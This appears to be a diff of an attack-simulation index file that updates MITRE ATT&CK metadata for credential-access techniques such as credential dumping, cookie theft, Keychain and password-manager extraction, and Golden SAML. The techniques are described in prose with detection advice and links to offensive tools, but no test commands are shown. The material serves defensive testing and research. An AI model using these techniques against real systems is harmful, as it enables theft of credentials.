+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests:
     - name: Malicious PAM rule
@@ -87597,7 +88259,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: Input Capture
@@ -87882,7 +88543,7 @@ credential-access:
         elevation_required: false
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -87911,6 +88572,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -87922,18 +88584,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -87960,9 +88622,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests:
     - name: Brute Force Credentials of single Active Directory domain users via SMB
@@ -88303,7 +88962,7 @@ credential-access:
         elevation_required: false
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -88427,7 +89086,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests:
     - name: Gsecdump
@@ -88605,7 +89263,7 @@ credential-access:
         elevation_required: false
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -88620,10 +89278,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -88631,14 +89290,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -88681,9 +89340,6 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests:
     - name: Steal Firefox Cookies (Windows)
@@ -88808,7 +89464,7 @@ credential-access:
         elevation_required: false
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -88863,9 +89519,8 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests:
     - name: Registry dump of SAM, creds, and secrets
@@ -89071,7 +89726,7 @@ credential-access:
         elevation_required: true
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -89122,9 +89777,8 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests:
     - name: Azure - Search Azure AD User Attributes for Passwords
@@ -89198,7 +89852,7 @@ credential-access:
         name: powershell
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -89232,8 +89886,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -89250,11 +89904,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -89272,7 +89925,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -89289,10 +89942,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -89316,7 +89969,6 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests:
     - name: Password Cracking with Hashcat
@@ -89366,41 +90018,8 @@ credential-access:
         elevation_required: true
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -89421,25 +90040,57 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests:
     - name: Keychain Dump
@@ -89495,42 +90146,7 @@ credential-access:
         elevation_required: false
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -89539,6 +90155,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -89546,16 +90165,47 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests:
     - name: Dumping LSA Secrets
@@ -89606,17 +90256,18 @@ credential-access:
         elevation_required: true
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -89629,14 +90280,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -89677,9 +90328,6 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests:
     - name: Golden SAML
@@ -89725,7 +90373,7 @@ credential-access:
         name: powershell
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -89788,7 +90436,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests:
     - name: Dump individual process memory with sh (Local)
@@ -90004,76 +90651,75 @@ credential-access:
         elevation_required: true
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
